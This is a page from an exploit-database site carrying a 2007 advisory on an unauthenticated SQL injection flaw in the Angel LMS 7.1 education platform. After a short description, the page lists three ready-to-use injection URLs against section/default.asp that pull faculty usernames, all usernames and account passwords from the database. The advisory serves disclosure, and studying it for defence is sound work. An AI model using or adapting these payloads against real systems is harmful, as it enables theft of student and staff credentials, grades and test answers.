[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Angel LMS 7.1 (default.asp id) Remote SQL Injection Vulnerability

Author
Craig Heffner
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1546
Category
web applications
Date add
01-03-2007
Platform
unsorted
=================================================================
Angel LMS 7.1 (default.asp id) Remote SQL Injection Vulnerability
=================================================================



#########################################################################
#
# Application:
#
#		Angel Learning Management Suite 7.1
#		http://www.angellearning.com
#
#########################################################################
#
# Description:
#
#		"ANGEL LMS is an inclusive suite of enterprise 
#		learning management tools that balances ease of 
#		use with powerful capabilities to deliver leading 
#		edge teaching and learning, impact learner success 
#		and measure effectiveness."
#
#		Basically, Angel is a CMS for education, providing
#		online forums, grading, email, chat, etc to faculty
#		and students. It is used as the primary Web interface
#		for several online schools and courses.
#
#########################################################################
#
# Vulnerability:
#
#		Angel 7.1 contains an SQL injection vulnerability in 
#		section/default.asp that grants an un-authenticated user 
#		access to all database tables and data. Examples include 
#		enumeration of tables, columns, user names, passwords, 
#		grades, and test questions/answers (you basically have 
#		access to everything).
#	
#########################################################################
#	
# Exploit Examples:
#
#	#Enumerate Faculty User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20faculty_accounts--"
#		
#	#Enumerate All User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#
#	#Enumerate Account Passwords#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
#
#########################################################################



#  0day.today [2024-12-25]  #